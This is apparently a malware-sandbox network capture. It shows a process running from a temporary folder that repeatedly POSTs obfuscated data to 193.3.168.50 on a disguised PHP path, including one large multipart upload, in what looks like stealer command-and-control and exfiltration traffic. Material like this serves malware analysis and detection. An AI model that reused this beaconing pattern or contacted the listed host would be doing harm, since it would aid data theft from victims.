User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 384
Expect: 100-continue
Dec 5, 2024 10:53:18.336882114 CET | 384 | OUT | Data Raw: (binary request body; hex and ASCII dump omitted)
Dec 5, 2024 10:53:18.384511948 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:18.734464884 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: (chunked response body, one chunk of size 0x98 followed by the terminating zero-length chunk; hex and ASCII dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:20.104814053 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:53:20.460542917 CET | 1060 | OUT | Data Raw: (binary request body; hex and ASCII dump omitted)
Dec 5, 2024 10:53:21.336755037 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:21.569391966 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.449741193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:20.595257044 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:20.940305948 CET1936OUTData Raw: 5a 59 5a 5f 5c 5d 5a 52 5a 58 51 52 55 5e 5a 5c 50 51 5d 58 59 5f 57 44 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ZYZ_\]ZRZXQRU^Z\PQ]XY_WD^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^/]+;4",<7:04%<42='./6 ?==#G $],
Dec 5, 2024 10:53:21.829662085 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:22.061327934 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49744 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:22.006339073 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:53:22.378456116 CET | 1060 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:23.233376026 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:23.465343952 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49745 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:23.734152079 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:53:24.080730915 CET | 1060 | OUT | Data Raw: (hex dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49746 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:24.289794922 CET | 487 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----vb00ndIHgHvNoJ7fSqVxvDUiUocs3TKQON
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 114202
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:53:24.649388075 CET | 12360 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:24.769570112 CET | 7416 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:24.769634962 CET | 2472 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:24.769876957 CET | 4944 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:24.769970894 CET | 4944 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:24.770133018 CET | 4944 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:24.889765024 CET | 2472 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:24.889789104 CET | 2472 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:24.889816999 CET | 4944 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:24.889844894 CET | 2472 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:25.508181095 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:26.074276924 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49748 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:25.261147976 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:53:25.611988068 CET | 1060 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:26.499133110 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:26.733485937 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49750 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:26.981178999 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49751 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:27.201997995 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1936
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:53:27.549489975 CET | 1936 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:28.439523935 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:28.677506924 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49752 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:27.322307110 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:53:27.674469948 CET | 1060 | OUT | Data Raw: (hex dump omitted)
Dec 5, 2024 10:53:28.562184095 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:28.797455072 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49753 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:29.043292046 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:53:29.393503904 CET | 1060 | OUT | Data Raw: 5f 5a 5f 5c 5c 5a 5f 53 5a 58 51 52 55 52 5a 5d 50 53 5d 5c 59 52 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _Z_\\Z_SZXQRURZ]PS]\YRWC^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-8 ?)<!6,/-Z7: .7Y3# 3$B";>=#G $],1
Dec 5, 2024 10:53:30.282882929 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:30.517685890 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49754 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:30.762357950 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:53:31.112122059 CET | 1060 | OUT | Data Raw: 5f 5e 5f 58 5c 5a 5a 52 5a 58 51 52 55 5e 5a 5c 50 53 5d 5c 59 5b 57 44 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _^_X\ZZRZXQRU^Z\PS]\Y[WD^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.80<)4]7,?- <.#$<?#"X$'5 *-#G $],
Dec 5, 2024 10:53:32.009406090 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:32.245738029 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49755 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:32.480103970 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:53:32.830878973 CET | 1060 | OUT | Data Raw: 5f 5c 5a 5c 5c 5b 5a 50 5a 58 51 52 55 5f 5a 5a 50 52 5d 53 59 52 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _\Z\\[ZPZXQRU_ZZPR]SYRWG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.83"+ &/97'.+'?'72%[38!3#)#G $],
Dec 5, 2024 10:53:33.718775988 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49756 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:33.812182903 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1936
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:53:34.159106016 CET | 1936 | OUT | Data Raw: 5f 5b 5f 5d 5c 5b 5f 55 5a 58 51 52 55 51 5a 5a 50 55 5d 5a 59 58 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _[_]\[_UZXQRUQZZPU]ZYXWA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.,0-]?*8]#:Z;?1]7_+,3']$,$R#"3$D!# >=#G $],=
Dec 5, 2024 10:53:35.050003052 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:35.285732031 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 09 11 26 01 24 15 3f 0d 33 02 06 08 28 1d 30 11 39 0d 3f 12 24 10 2d 44 25 14 2b 1c 3e 03 23 11 22 2d 32 5b 29 3a 37 56 2b 27 02 57 2a 02 20 58 00 1a 26 5c 34 21 24 5b 2e 5f 3c 1e 32 5b 21 04 27 13 2d 5a 3d 29 28 08 3d 0d 3b 0f 25 2d 22 53 3d 33 00 08 2c 34 2a 04 2e 3e 29 01 24 3f 2a 52 0e 17 21 51 2a 07 24 5e 37 22 3e 0c 29 22 24 07 3c 01 2c 0e 33 2b 32 18 20 2e 07 1c 33 09 39 1f 30 0b 2d 0b 27 3b 2b 5e 31 3c 38 5b 3d 39 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 98&$?3(09?$-D%+>#"-2[):7V+'W* X&\4!$[._<2[!'-Z=)(=;%-"S=3,4*.>)$?*R!Q*$^7">)"$<,3+2 .390-';+^1<8[=9 _. W1WT0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49757 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:33.932337999 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:53:34.283932924 CET | 1060 | OUT | Data Raw: 5f 5f 5f 59 59 5b 5a 51 5a 58 51 52 55 54 5a 5a 50 5f 5d 5a 59 58 57 46 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: ___YY[ZQZXQRUTZZP_]ZYXWF^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.805^=9[7P%.?9[ 9'9$0 25^3$!37*-#G $],)
Dec 5, 2024 10:53:35.170809984 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:35.405895948 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49758 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:35.652005911 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:53:36.002718925 CET | 1060 | OUT | Data Raw: 5f 5a 5a 58 5c 5c 5a 50 5a 58 51 52 55 5e 5a 5b 50 50 5d 5c 59 5b 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _ZZX\\ZPZXQRU^Z[PP]\Y[WH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\._85(*+ 6:;<=Y :'.Y'/ #%.$E5?)#G $],
Dec 5, 2024 10:53:36.889818907 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:37.125454903 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49759 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:37.370738983 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1056
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:53:37.750035048 CET | 1056 | OUT | Data Raw: 5f 5c 5f 5f 59 5a 5f 55 5a 58 51 52 55 57 5a 5f 50 52 5d 59 59 5d 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _\__YZ_UZXQRUWZ_PR]YY]WA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.[;5X?_775);/%X4):3;',729[$=/60+)#G $],5
Dec 5, 2024 10:53:38.607925892 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:38.841646910 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:53:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
